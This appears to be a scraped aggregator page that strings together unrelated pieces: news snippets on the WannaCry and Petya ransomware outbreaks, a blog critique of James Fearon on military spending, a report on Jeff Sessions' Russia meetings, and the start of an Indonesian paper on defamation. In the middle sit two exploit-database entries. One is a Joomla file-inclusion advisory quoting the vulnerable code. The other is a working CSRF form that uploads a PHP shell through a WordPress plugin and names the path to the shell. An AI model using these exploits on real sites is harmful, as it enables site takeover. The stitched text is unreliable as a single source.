IT Security Was “WannaCry” Avoidable? A Wake-Up Call for IT Security Departments In May, the media reported one of the biggest ransomware cyber-attacks in history. The European Union’s law enforcement agency Europol wrote on Twitter that the ransomware “wannacry” was an attack at an “unprecedented level”, which infected countless private and corporate computers running on
          March 2017   
Tech-Talk IP Security Reputation Check with the Information Floater There are many threats on the web, one of which is opening emails with links to unknown websites. Phishing-mails often lead to malware, ransomware or other malicious software that infects your system and threatens your data security.   Abuse teams, cyber security teams or mail server
          Cyber Attack Hits European Countries, Ukraine Power Grid, US Official Blames Russia
          دانلود U Messenger - Photo Chat 3.9.2 برنامه یو مسنجر اندروید   
برنامه یو مسنجر U Messenger - Photo Chat یک نرم افزار چت جدید از کمپانی معتبر و نام آشنای CyberLink است که به تازگی در مارکت گوگل عرضه شده است و تصمیم گرفتیم مثل همیشه اولین نسخه برنامه را در سایت گـت اندروید خدمت کاربران گرامی معرفی کنیم. U Messenger یک مسنجر معمولی نیست و با تمام برنامه های مشابهی که تا به امروز دیده اید تفاوت دارد. یو مسنجر یک برنامه حرفه ای و تمام عیار برای به اشتراک گذاری تصاویر شماست. شما میتوانید عکس هایی که از مسافرت ها ، مهمانی ها ، جشن ها و لحظات خوشی که داشته اید گرفته اید را به راحتی با دوستانتان به اشتراک بگذارید. از امکانات جالب یومسنجر این است که میتوانید گالری تصاویر شخصیتان را ایجاد کرده و تصاویرتان را به آن گالری ها اضافه کنید. همچنین میتوانید متن دلخواه همراه با صدای خودتان را به تصاویر اضافه کرده و آنرا با دوستانتان به اشتراک بگذارید. این نرم افزار دارای صدها استیکر جذاب و فانتزی رایگان است که مطمئنا از دیدنشان لذت خواهید برد.
          Bookmarks for May 16, 2011   

Cyberlibrary CyberLibrary is an Open Source library management system that can be run from anywhere on the internet or an intranet. openbook4wordpress When you insert an OpenBook shortcode with an […]

The post Bookmarks for May 16, 2011 appeared first on What I Learned Today....

          Enterovirus D68, School Lunch, Soda Tax - PediaCast 296   
Join Dr Mike in the PediaCast Studio for more news parents can use. This week’s topics include breakfast & type II diabetes, nutritional value of packed lunches, family meals & cyberbullying, soda tax, TV ads & apple fries… plus everything you need to know about the outbreak of Enterovirus D68!
          Sleep Machines, ADHD, Teen Suicide - PediaCast 283   
Join Dr Mike in the PediaCast Studio for more news parents can use. This week’s topics include infant sleep machines, breastfeeding & IQ, ADHD & obesity, teen suicide, cyberbullying, gang membership, and the benefits of volunteer opportunities.
          Eight organisations score grants for cyber safety initiatives   
Netsafe, an independent, non-profit organisation focused on online safety, has awarded grants to eight projects that aim to combat online abuse, bullying and harassment in New Zealand in the first round of its annual online safety partnership grant program.
          A new ransomware is sweeping the globe, but there's a vaccine   

It's a familiar story: You boot up your computer only to find a mysterious message saying your files are encrypted. You soon realize that your data is likely gone for good — even if you fork over a cryptocurrency ransom payment. 

But this time around, as a new and virulent form of ransomware dubbed NotPetya sweeps the globe, it doesn't have to be this way. 

Because this time around, there's a vaccine. 

What is NotPetya?

The first symptoms of the attack appeared on June 27 in Ukraine, with the National Bank of Ukraine and the Kiev International Airport both hit hard. Even Chernobyl's radiation monitoring system has reportedly been affected. But NotPetya, which targets the Windows operating system, didn't stay thereMicrosoft has confirmed that computers in 64 additional countries have been infected.  Read more...

More about Hackers, Hacking, Bitcoin, Ransomware, and Wannacry
          ROUNDUP: Globaler Angriff mit Erpressungssoftware verursacht Chaos   
BERLIN (dpa-AFX) - Nach dem zweiten massiven Angriff mit Erpressungssoftware innerhalb von zwei Monaten kämpfen Firmen rund um den Globus mit den Folgen der Cyber-Attacke. Zu den betroffenen Unternehmen zählen der Nivea-Hersteller Beiersdorf und die dänische Reederei Maersk, bei der Terminals in mehreren Häfen ausfielen...
          Experten: Cyberangriff sollte Daten löschen statt Lösegeld erpressen   
DUBAI (dpa-AFX) - Die Angriffs-Software bei der massiven Cyber-Attacke vom Dienstag zielt Experten zufolge auf Datenvernichtung ab und tarnt sich nur als Erpressungstrojaner. Das Programm lösche die ersten Sektoren auf der Festplatte, statt sie zu verschlüsseln, erklärte die IT-Sicherheitsfirma Comae Technologies am Mittwoch...
          ROUNDUP: Sicherheitsexperten warnen vor Cyber-Terror gegen Infrastruktur   
TEL AVIV (dpa-AFX) - Die weltweite Bedrohung durch Cyberattacken wird nach Ansicht von Sicherheitsexperten noch deutlich unterschätzt. Auch im Hinblick auf den jüngsten Angriff mit Erpressungssoftware in Europa und den USA befinde sich die internationale Gemeinschaft in einem "Zustand der Hilflosigkeit", sagte Wolfgang...
          Sicherheitsexperten warnen vor Cyber-Terror gegen Infrastruktur   
TEL AVIV (dpa-AFX) - Die weltweite Bedrohung durch Cyberattacken wird nach Ansicht von Sicherheitsexperten noch deutlich unterschätzt. Auch im Hinblick auf den jüngsten Angriff mit Erpressungssoftware in Europa und den USA befinde sich die internationale Gemeinschaft in einem "Zustand der Hilflosigkeit", sagte Wolfgang...
Cyber-Link bei Ulf gesehen! Den Link hab ich mal mit Mara-Toni ausprobiert und was kommt raus: Das mit meinem Kreuz ist doch ernster als ich dachte. Nix ist es mit Training - es reichte gerade mal zu Walken mit den Wuffties am Morgen. Aber allein das war schon zu viel des Guten. Also den ganzen Nachmittag in der Liege rum hängen, was ja bei dem Wetter auch nicht unbedingt das schlechteste ist. An meine vermeintlichen "Schreibfehler" habt Ihr Euch ja schon gewöhnt - das ist übrigens meine eigene Rechtschreibversion - was brauche ich BILD und SPIEGEL als Wegbereiter im deutschen Rechtschreibdschungel. Ich finde es eine ziemlich übertriebene Art auf diese Weise Arbeitsplätze schaffen zu wollen.
          Global Trends in Militarization Needs Global Explanations   

In my opinion, James Fearon misses an opportunity to link theories together in a productive way. Of the global decline of military spending (% GDP) and mobilization (soldiers per 1,000 citizens) in the postwar era:
On the domestic side of things, there is pretty good evidence that the spread of democracy has been a significant factor. Not worth getting into the details here, but if you look at the data country by country you find that on average, when countries transition to democracy their military spending and army sizes go down, quite substantially.* In fact they tend to go down when they transition from very autocratic to only somewhat autocratic (that is, to “anocracies”, or semi-democracies using the Polity data). The effect of a democratic transition on arms levels in the state in which the transition occurs looks to be larger than the effect of transitions in neighbors on a state’s own military spending, although this is hard to be sure about statistically due to endogeneity issues. I would guess that most of the democracy effect is a domestic matter—for instance, autocracies want bigger militaries to help put down domestic opposition or to pay off cronies, or democracies want smaller militaries to lower coup threats—but some of it might also be an international effect. That is, if democracies want smaller militaries then this could reduce the demand for big armies in their neighbors.
Fearon is reporting a trend, not advancing a well-formulated argument, but I still think this is fairly weak. Here are some other things we know about violence in the postwar era:

-- Interstate violence is at the lowest point in the capitalist era. Given that, it makes perfect sense for military burdens to be at a low point as well. We do not know for certain why the world is so peaceful, but quite a lot of IR theory suggests that American hegemony (which Fearon does not mention) and nuclear weapons (which he does) may have something to do with it. Regarding the former, the American security umbrella covers other democracies and (sometimes) extends to countries transitioning to democracy -- the pacification and democratization of Europe since 1945 is obviously the most pronounced example -- so that could help explain the domestic patterns without telling a ad hoc story about democracies being worried about coup threats (which strikes me as being ahistorical and is in contradiction to the best evidence). Regarding the latter, technology should push down military cost burdens and personnel needed as more and more security mechanisms become computerized and/or automated, at least during times of peace. Nukes are part of that but so are drones, missile technology, cyber capabilities, etc. Given the decline of international conflict and the lower marginal costs of defense why wouldn't we expect the military burden to decrease?

-- As for the fact that the drop in military burden has happened most in democracies I'd note several things. First, it appears from Fearon's description that many democracies were quite heavily armed in the middle of the 20th century. In Fearon's graph at the link above this is quickly seen by the number of people per 1,000 that were in the military in 1945-1950 in "the West". Given that, I don't think a regime-type explanation works very well. Second, democracies are richer, and richer countries should (on average) spend less on their militaries as a percentage of GDP. That is, there is a almost certainly diminishing returns to spending on security: the 10 trillionth dollar spent on national defense will not get you as much security as the 10 millionth. Among consolidated democracies only the U.S. and Israel spend more than 3% of their GDP on their militaries, and I think there is general agreement that much of the American spending is due to rent-seeking, bureaucratic politics, and its ongoing hegemonic project rather than its regime type.

-- Almost all conflict which does occur in the international system is intra-state. Intra-state violence tends to happen more in non-democracies than in democracies. Countries in a state of conflict should dedicate more of their resources towards the military than countries in a state of peace. Therefore, because they are more peaceful, democracies should spend fewer resources on the military. The only wrinkle in this involves transitions to democracy, which often involve conflict. The way I read Fearon he's saying that after transitioning to democracy the military burden decreases; I'm not sure if his data could tell us what's happening during democratic transitions, but it would be interesting to know.

I'm nit-picking a bit here, albeit for a reason. Fearon found some interesting trends, reported them, and then thought-aloud about what might be causing them. There's nothing wrong with that. But the quick-reflex pivot to explanations based on local factors such as regime type is, for me, unsatisfying. Once one takes that step it makes it difficult to think about broader systems, and makes committing an ecological fallacy much more likely. If we're seeing a systemic trend -- lower military burdens everywhere -- then we should seek to make systemic arguments which can account for the trends. Too frequently we try to explain global phenomena by reference to local factors.
          Die unterschätzte Gefahr aus dem Cyber-Space   
Erst “Wannacry”, jetzt “Petya” – scheinbar nach Belieben greifen Cyber-Erpresser Unternehmen rund um den Globus an. Die aktuelle Version der Ransomware könnte die gleiche Sicherheitslücke in Windows nutzen, durch die bereits der „Wannacry“-Virus seinen Weg in die Systeme fand. Auch Monate nach dem Bekanntwerden ist das Einfallstor vielerorts noch nicht geschlossen – weil viele Unternehmen […]
          Bash Shell Completing File, User and Host Names Automatically   
Bash can auto complete your filenames and command name. It can also auto complete lots of other stuff such as: => Usernames => Hostname => Variable names => Fine tuning files and names with ESC keys Match variable If the text begins with $, bash will look for a variable. For example, open terminal and … Continue reading "Bash Shell Completing File, User and Host Names Automatically"
          Attorney General Jeff Sessions Met Twice With Russian Ambassador in 2016 While Member of Trump Campaign Team   
In what appears to be a direct contradiction to his confirmation testimony, it is now being reported that Attorney Genera Jeff Sessions twice met with a Russian ambassador in 2016, while a member of the Trump campaign. The Washington Post reports:
Then-Sen. Jeff Sessions (R-Ala.) spoke twice last year with Russia’s ambassador to the United States, Justice Department officials said, encounters he did not disclose when asked about possible contacts between members of President Trump’s campaign and representatives of Moscow during Sessions’s confirmation hearing to become attorney
Attorney General Jeff Sessions
One of the meetings was a private conversation between Sessions and Russian Ambassador Sergey Kislyak that took place in September in the senator’s office, at the height of what U.S. intelligence officials say was a Russian cyber campaign to upend the U.S. presidential race.
The previously undisclosed discussions could fuel new congressional calls for the appointment of a special counsel to investigate Russia’s alleged role in the 2016 presidential election. As attorney general, Sessions oversees the Justice Department and the FBI, which have been leading investigations into Russian meddling and any links to Trump’s associates. He has so far resisted calls to recuse himself.   
When Sessions spoke with Kislyak in July and September, the senator was a senior member of the influential Armed Services Committee as well as one of Trump’s top foreign policy advisers. Sessions played a prominent role supporting Trump on the stump after formally joining the campaign in February 2016.
At his Jan. 10 Judiciary Committee confirmation hearing, Sessions was asked by Sen. Al Franken (D-Minn.) what he would do if he learned of any evidence that anyone affiliated with the Trump campaign communicated with the Russian government in the course of the 2016 campaign.“I’m not aware of any of those activities,” he responded. He added: “I have been called a surrogate at a time or two in that campaign and I did not have communications with the Russians.”
In January, Sen. Patrick J. Leahy (D-Vt.) asked Sessions for answers to written questions. “Several of the President-elect’s nominees or senior advisers have Russian ties. Have you been in contact with anyone connected to any part of the Russian government about the 2016 election, either before or after election day?” Leahy wrote. 
Sessions responded with one word:  "No."
It is difficult to conclude that Sessions' testimony was anything but untruthful.  To complicate matters, it appears Sessions' himself could be a focus of an investigation into Trump's Russian ties.   These developments will only increase the push for the appointment of a special prosecutor to probe the Trump campaigns' interaction with Russian officials leading up to the 2016 election.
          Small idea... buy 100 and buy 1000 silver chest   

Sure could have used this when i was doing this test:

           Netrepreneur Simulation: The Development of realism in Virtual E-Entrepreneurship Learning    
Lavelle, Dawn and Rose, Arjun and Jiwa, Salim (2007) Netrepreneur Simulation: The Development of realism in Virtual E-Entrepreneurship Learning. In: Utilizing and Managing Commerce and Services Online. Cybertech Publishing, pp. 136-167. ISBN 1591409330
          Comment on Maersk contains cyber attack, other lines hit by Lee Williamson   
This was not a targeted attack at Maersk alone, lets not fool anyone to try and generate hype and headlines. It was a Cyber accident waiting to happen. Simply by not taking precautions such as patching updates provided by Microsoft could lead to this and many more organizations across many industries were effected yesterday, today and last month by wannacry. By deploying patches in a timely manner, using technologies which combat zero day threats like ransomware which have been commercially available for over two years would have reduced the threat and therein the risk The need to combine technology, with education, polices, procedures not just on an IT level but business level is needed to reduce the threat. If you aren't aware of a risk or how threats combined could effect your operations, how can you expect to mitigate them or be ready to recover in a planned timely manner?
          Petya ransomware epidemic spreads, old NSA Windows exploit may be key   
The New York Times said cybersecurity experts at Symantec indicated the attack is hitting Windows computers through an NSA-developed … The tech below the surface Edge-to-edge displays on cell phones are becoming a thing now, with handsets like the …
          Linkpost | 6.15.2011   
Updated 2:32 p.m. • China’s Cyberassault on America – Former presidential national security chief Richard Clarke says China is conducting a systematic cyberwar on the U.S., and so far we’re not doing anything to protect the national’s information networks. • LulzSec opens hack request line – You can call a phone number and request potential
          'Petya' Computer Virus Spreads From Ukraine to Disrupt World Business   
A new cyber virus spread from Ukraine to wreak havoc around the globe on Wednesday, crippling thousands of computers, disrupting ports from Mumbai to Los Angeles and halting production at a chocolate factory in Australia. The virus is believed to have first taken hold on Tuesday in Ukraine where it silently infected computers after users downloaded a popular tax accounting package or visited a local news site, national police and international cyber experts said. More than a day after...
          Trump Criticized at Senate Panel Hearing on Response to Russian Hacking    
A former top diplomat in Republican U.S. president George W. Bush’s administration criticized President Donald Trump for being “unwilling to act against Russia” in retaliation for the Kremlin’s interference in last year’s election. Nicholas Burns, who served as undersecretary of state for political affairs in the Bush administration, told lawmakers, “I find it dismaying and objectionable that President Trump continues to deny the undeniable fact that Russia launched a major cyber attack...
          By: delenn13   
If I am wrong, I don't mind admitting it. <a href="" rel="nofollow">Water-pump failure in Illinois wasn’t cyberattack after all - The Washington Post</a> ......If you trust the government's word. I wonder if Kim will post a retraction?
          By: techpaul   
delenn13, I understand (and accept) how the term "game" has come into use (aka "cat and mouse game", a game of 'catch up', war games, etc.) even in reference to hackers/cybercriminals and things "cyber"; but I make a point (mindful of future readers) to NOT use "game" (any more) - as the "prizes" are already real. I want to emphasize this reality is no "small stakes" trivial matter. No "game". A massive crime epidemic, and worse. And these are only the early days.. Stuxnet is weaponized malware ("probably") employed by a nation/state. I look at the Chinese traffic slurping the same way I do an atomic (bomb) test. (And I don't know which I'm more afraid of.. if I get nuked, it's over in an instant. Shut down the Internet, and western civ collapses..) <blockquote>Folks, take a look at what delenn13 took the time to provide, won't you?</blockquote>
          Security Analyst - PAM, IAM, Password Vaulting, CyberArk, AD, Scripts   

          in West Africa : & :gre   
great links for contacts.
          CyberSecurity Engineer - Black Box Network Services - Lawrence, PA   
Programming experience in Perl, Python, Bash, Ruby or other scripting language. This position is for a senior engineer in the CyberSecurity department....
From Black Box Network Services - Wed, 07 Jun 2017 20:18:04 GMT - View all Lawrence, PA jobs
          How Advertising Mogul Martin Sorrell Responded to his Company’s Cyberattack   

Sir Martin Sorrell, chairman and CEO of WPP, has wasted little time personally updating stakeholders on the extent of the damage.

The post How Advertising Mogul Martin Sorrell Responded to his Company’s Cyberattack appeared first on | Chief Executive magazine.

          President’s Executive Order on Cybersecurity   
President Donald Trump has signed an executive order on cybersecurity as a response to the WannaCry ransomware attack. This executive order is entitled as “Strengthening the Cybersecurity of Federal Networks and Critical Infrastructure.”  The executive order contains three main sections and a fourth category that includes some definitions of terms that are contained in the […]
          US Military hacked, access sold for under $500   

Thanks to Hollywood, most Americans have a rather grand idea of the sort of cutting-edge technical sophistication employed by the United States government. The reality is actually a lot more dire. Consider the […]

The post US Military hacked, access sold for under $500 appeared first on

          Quanto e Perché Investire in Soluzioni di Cyber Security   
Internet è ormai un ambiente irrinunciabile in cui condurre il proprio business. Tuttavia, gli hacker lo hanno reso un luogo pericoloso: aziende di qualsiasi dimensione sono state attaccate, e il numero di attacchi informatici è destinato ad aumentare. Source: Quanto dovrebbe investire un’azienda di medie dimensioni nella protezione dai cyber criminali? A questo interrogativo […]
          Why You Shouldn’t Pay the Petya Ransomware   
If you were affected by the latest global cyber attack that locked businesses out of their computer
          FBI Questions U.S. Employees at Russian Cyber Firm Kaspersky Lab   
The FBI interviewed several U.S. employees of Moscow-based cyber security firm Kaspersky Lab this we
          CyberWar MYID   

CyberWar between Malaysian and Indonesian HackersCyberWar between Malaysian and Indonesian Hacker due to misunderstanding between
Malaysia and Indonesia.
In this situation Indonesia hacker has set up an Operation to attack Malaysian site (OpMalaysia).

The CyberWar begin while some of Indonesian hacker start hacking malaysian site with file
fuckyou.txt with inside contain "Fuck you all" that make some of malaysian hacker get angry
with them.

Then, Eagle Eye from DACC and UMCA has started attack Indonesian site as 
While this happen , start the 
misunderstanding between Malaysia and Indonesia.
This attack occurred from 18/08/2013 until 19/08/2013 , below is malaysian and indonesian site defaced!

Indonesia sites

Malaysian sites

After that , this CyberWar ended with apologize from Eagle Eye for attacking indonesian sites , the OpMalaysia was cancelled.

          Joomla ( com_invest ) LFI vuln   

0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            :                                   0
1  [+] Support e-mail  : submit[at]                         1
0                                                                      0
1               #########################################              1
0               I'm Caddy-dz member from Inj3ct0r Team                 1
1               #########################################              0

# Exploit Title: Joomla Component com_invest LFI Vulnerability
# Author: Caddy-Dz
# Facebook Page:
# E-mail:
# Category:: webapps
# Plugin:,com_phocadownload/Itemid,3/id,7/view,category/
# Google Dork: [inurl:index.php?option=com_invest controller=]
# Security Risk: medium
# Tested on: Windows Seven Edition Integral / French

# Sp Greetz To 1337day Team

[*] Vulnerable Code :

// get controller
if ($controller = JRequest::getVar('view')) {
        $path = JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php';
        if (file_exists($path)) {
        } else {
                JError::raiseError(JText::_('unknown controller'));
[*] Exploit :

          Wordpress Plugin Sexy Add Template   

 0          _                   __           __       __                         1
 1        /' \            __  /'__`\        /\ \__  /'__`\                       0
 0       /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___               1
 1       \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\              0
 0          \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/               1
 1           \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\               0
 0            \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/               1
 1                       \ \____/ >> Exploit database separated by exploit       0
 0                        \/___/          type (local, remote, DoS, etc.)        1
 1                                                                               0
 0       [x] Official Website:                            1
 1       [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                      0
 0                                                                               1
 1                  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                   0
 0                  I'm NuxbieCyber Member From Inj3ct0r TEAM                    1
 1                  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                   0

 |||   Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability    |||

 ./Title Exploit : Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability
 ./Link Download :
 ./Author Exploit: [ TheCyberNuxbie ] [ ] [ nux_exploit ]
 ./Security Risk : [ Critical Level ]
 ./Category XPL  : [ WebApps/ZeroDay ]
 ./Tested On     : Mozilla Firefox + Xampp + Windows 7 Ultimate x32 ID
 ./Time & Date   : September, 22 2012. 10:27 AM. Jakarta, Indonesia.

 |||                        -=[ Use It At Your Risk ]=-                        |||
 |||               This Was Written For Educational Purpos Only                |||
 |||               Author Will Be Not Responsible For Any Damage               |||

 # [ Information Details ]
 # - Wordpress Plugin Sexy Add Template:
 # Attacker allow CSRF Upload Shell.
 # http://localhost/wp-admin/themes.php?page=AM-sexy-handle <--- Vuln CSRF, not require verification CODE "wpnonce".
 # <html>
 # <head>
 # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 # <title>Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability</title>
 # </head>
 # <body onload="document.form0.submit();">
 # <form method="POST" name="form0" action="http://localhost/wp-admin/themes.php?page=AM-sexy-handle" method="post" enctype="multipart/form-data" >
 # <input type="hidden" name="newfile" value="yes" />
 # <input type="hidden" type="text" value="shell.php" name="AM_filename">
 # <textarea type="hidden" name="AM_file_content">
 # [ Your Script Backdoor/Shell ]
 # </textarea>
 # </form>
 # </body>
 # </html>
 # - Access Shell:
 # http://localhost/wp-content/themes/[theme-name]/shell.php

          Cyber and Information Security Lead - Crum & Forster Insurance Co - Morristown, NJ   
For more information about Crum &amp; Forster, please visit our website:. Crum &amp; Forster is a leading national property &amp; casualty insurance company with a large,...
From Indeed - Tue, 11 Apr 2017 20:35:23 GMT - View all Morristown, NJ jobs
          Consultant - Identity & Access Management - Simeio Solutions - Atlanta, GA   
Privileged Access Management (CyberArk, Lieberman Software, BeyondTrust, CA Exceedium, IBM SPIM, Dell TPAM, etc). Consultant - Identity &amp; Access Management....
From Simeio Solutions - Mon, 10 Apr 2017 14:05:25 GMT - View all Atlanta, GA jobs
          Firewall Security Sr. Analyst (Day Shift) - SecureWorks - Dell - Atlanta, GA   
Triaging incidents, answering inbound phone calls, addressing customer emails, and providing support for neighboring teams within Dell SecureWorks’ Cyber...
From Dell - Tue, 27 Jun 2017 17:14:49 GMT - View all Atlanta, GA jobs
          Sex Change in RPGs   

Rani Baker has written an interesting article on gender bending in tabletop role playing games throughout the ages: “Is Every Woman Here A Sex Change?” — Trans In Cyberpunk RPG

Here is a relevant quote:

But in the 90s, the cyberpunk genre emerged to dust off these Atomic Age artefacts and carefully lay a patina of grunge over them, showcasing them between images of shock value fetish and surprisingly accurate speculation on an internet culture that was barely beginning to exist. Atomic Age fascination with transsexuals as a form of body augmentation fared no differently. The genre, with it’s focus on self-identity, chaos and tech, seemed to go hand in hand with tabletop and computer role-playing, and many series developed congruently with their spin-off RPGs. Hell, even Infocom, the makers of Zork, released a computer game where you could do drugs and hook up with transsexual strippers.
More here!

          Dreadnaughtdarling Coupon Code - Save 20% Off   
Dreadnaughtdarling Coupons - Cyber Monday!!! This is the last day for 20% off on all Etsy orders! Enter code THANKFUL at checkout!
          Cyber Dodge An Easy to Pick Up and Play Game for iPhone   
Cyber Dodge Rating: 3.5 out of 5 stars Cyber Dodge for iPhone is a very simple arcade style game that got me addicted from the jump. It is very easy to pick up and play and the tied in social networking features that OpenFeint brings to the table make it easy to compete with friends. You control a cyber avatar with the task ... Read More
          Model contract for delivery of a Teenage Smart Phone   

(Name of teen in question), residing at (Street Address) (City) accepts the following standards for the use and enjoyment of their (Brand and Model Smart Phone) with (calls, 3G data, etc. ).

The (Brand and Model Smart Phone) is of my parents (full name of parent). They bought it. Pay for their connection to the telephone company X. I give it to me, (Name of teen in question). My parents are the best!.

My parents always know the password.

If it rings, answer it. It's a phone. I'll say hello, I'll be polite. Never ignore the call if my father or my mother. Never ignore them.

Deliver the phone at 22:00 pm if you have class the next day, and 23.00h the weekend. The phone will turn off at night and turn back on at 8:00 h. I will respect the schedules of the other families, as we like to also be respected.

I take the phone to school. Talk to the people who send you messages then. It is a social skill.

If you drop the tub, or breaks down, I will be responsible for paying for the repair. You have that planned spending.

Do not use the technology to lie or make fun of anyone. Do not engage in conversations that may hurt others or at least stay away from those situations. Be a good friend.

Do not post, email or you contact with people you would not in person.

No converse by phone with people you'd bring home no.

No porn. If in doubt ask someone. Preferably your father or your mother.

Turn it off or put it on silent when in public. Especially in theaters or when you're talking to a person. You're rude, do not let a mobil change that.

Do not send or receive images of the intimate parts of one, (do not laugh at what I just said), one day you'll be tempted to do so even if you are very intelligent. It is dangerous and could ruin your adolescence. It's a bad idea. Cyberspace is larger and more powerful than you. And it's hard to make something disappear, including poor reputation.

Do not make photos and videos of all. No need to document your entire life. Live your experiences. They will be stored in your memory forever.

Occasionally leave the phone at home and feel safe with that decision. The mobile is not an extension of your body. Learn to live without it.

Download new music or old or different from the millions of people who listen simultaneously. Your generation has access to more songs than anyone has ever had access to before. Enjoy this privilege. Expand your horizons.

Word games, puzzles or mental training are best for your development.

Keep your eyes open, watching the world going on around you, look out the window, listening to the birds, walk, talk to people around you, looking for answers to things without using Google.

If you do not meet any of the points of this contract you will remove the phone. We will sit and talk about it and start again. You're always learning. We are a team and we are in this together.

What sign for all purposes.

(Date and signature of the adolescent)

          Demisto and Vectra Networks Reduce the Time to Detect and Respond to Hidden Cyber Attacks   
Demisto , Inc., an innovator in Security Automation and Orchestration technology , and Vectra Networks , the leader in automating the hunt for... Read more at
          Ransomware Petya - komentarz Barracuda Networks   

Wczorajszy dzień przyniósł kolejną serię ataków cybernetycznych na globalną skalę. Oprogramowaniem ransomware o nazwie Petya (Pietia) zainfekowane zostały systemy informatyczne na Ukrainie, w Danii, Rosji i Wielkiej Brytanii. Ataki spowodowały poważne zakłócenia w działalności wielu firm i instytucji publicznych. Cyberatak skomentował Hatem Naguib, wiceprezes i Główny Menedżer działu Rozwiązań Bezpieczeństwa Barracuda Networks.

          Génération Proteus   
Alex Harris, un brillant professeur en cybernétique, a mis au point l'ordinateur le plus perfectionné du monde. Doté d'un cerveau artificiel qui a nécessité des années de travail, Proteus IV est mis à la disposition des intelligences humaines qui l'ont créé. Il parle comme un humain et ses capacités de logique et de réflexion se développent à grande vitesse. Ainsi, très vite, l'ordinateur manifeste le désir d'étudier l'homme.

Je viens de passer près de 48 heures sans internet (damnation ultime). J'ai failli craquer hier en passant devant un cyber-café, mais je me suis dit que payer pour lire des blogs mêmes pas mis à jour quotidiennement aurait été légèrement déplacé. Donc ce week-end je ne bossais pas (ouf...) et j'ai pu me reposer (id est me lever à 14 heures). Résultat j'ai raté le marché, je n'ai plus rien à bouffer (pour changer) et j'ai découvert de nouveaux bars sympa. Je le savais que cette ville pouvait être accueillante. On ma même payer des bières !! Quel charme je dois avoir auprès des piliers de bars quinquagénaires dis donc ! (hem, hem,...)

À part ça je vous poste quelques photos que j'aimes bien et qui visiblement étaient trop conceptuelles pour la ligne éditoriale du journal.


          Cyber attack continues its destructive world tour   
The cyber attack that started Tuesday is wreaking havoc across the globe Wednesday, crippling thousands of computers, disrupting operations at ports from Mumbai to Los Angeles and halting production at a chocolate factory in Australia.

          Cyberspace, Terrorism and International Law   

Governments have long worried about terrorists using the Internet to launch cyberattacks, spread propaganda, recruit and radicalise individuals and raise funds. However, the Islamic State’s exploitation of social media has caused a crisis and generated questions about international law’s role in addressing terrorism in cyberspace.

          Cybereason RansomFree + Portable   
Cybereason RansomFree + Portable

Cybereason RansomFree - инструмент для защиты компьютеров Windows, сетевых и общих дисков от троянов-шифровальщиков (включая WannaCry, а также Locky, Cryptowall, TeslaCrypt, Jigsaw и Cerber). Утилита, для обнаружения вредоносов, использует поведенческий анализ и не требует обновления сигнатур.

          Asset TV: Cybersecurity, fess on managers’ minds   
Christine Fenske, managing partner at Baker Tilly, offers insight into what keeps her clients up at night. Fenske says that cybersecurity is an important consideration right now for managers, alongside fee structure and compliance. Registration required to view content on Asset TV.
          Black Friday and Cyber Monday Homeschool Discounts   
Hello Black Friday and Cyber Monday deals! (By the way, how was your Turkey Day?)  If you’re in the U.S. you’re probably stuffed to tears with turkey or ham, mac and cheese, or pumpkin pie (sweet potato pie for me.) I’m having a wonderful time visiting relatives out of town and seeing old friends I […]
          Cyber Security Project Manager - DXC Technology - Toronto, ON   
Created by the merger of CSC and the Enterprise Services business of Hewlett Packard Enterprise, DXC Technology serves nearly 6,000 private and public sector...
From DXC Technology - Sat, 24 Jun 2017 13:18:16 GMT - View all Toronto, ON jobs
          NATO Chief Says Recent Cyber Attack Could Spark Mutual Defense Response   
Activist Post By Joseph Jankowski A major global cyber attack which struck particularly hard in Ukraine on Tuesday could potentially trigger NATO’s Article 5 mutual defense commitment, according to NATO chief Jens Stoltenberg. On Tuesday, computer systems around the world were subjected to ransomware cyber attacks that spread from Ukraine and Russia, across Europe to the United States and then on […]

Dengan mengucapkan segala puji bagi Allah SWT,yang telah memberikan rahmat dan karunianya sehingga Saya pada akhirnya dapat menyelesaikan penulisan Karya Tulis Ilmia ini dengan baik dan benar dimana makalahnya menyajikan dalam bentuk yang sederhana adapun judul makalah ini adalah “ JANGAN NODAI NAMAKU” yang merupakan salah satu Tugas Besar Akhir Semester pada mata kuliah Pancasila
Kami menyadari bahwa dalam penyusunan makalah ini tidak lepas atas bimbingan dan dorongan dari semua pihak. Oleh karena itu pada kesempatan yang baik ini kami tidak lupa mengucapkan terima kasih kepada :
1.      Bapak Ade Malobassang SH. MH. sebagai dosen yang mengajar mata kuliah ini.
2.      Orang tua kami yang telah memberi dukungan materi dan moral sehingga dapat menyelesaikan Tugas Ini.
3.      Teman-teman kami yang telah memberi dukungan dan saling bertukar pendapat guna menambah wawasan.

                                               Makassar, 15 November 2014

Kata pengantar   ...........................................................   i
Daftar isi   ...................................................................   ii

BAB I     Pendahuluan
a.       Latar belakang   ...................................................   1
b.      Maksud Dan Tujuan   ..........................................   2
c.       Metode penelitian   ..............................................   3

BAB II    Pembahasan
A. Pandangan Pencemaran Nama Baik....................    4
B. Dasar Hukum …………………...........................  36
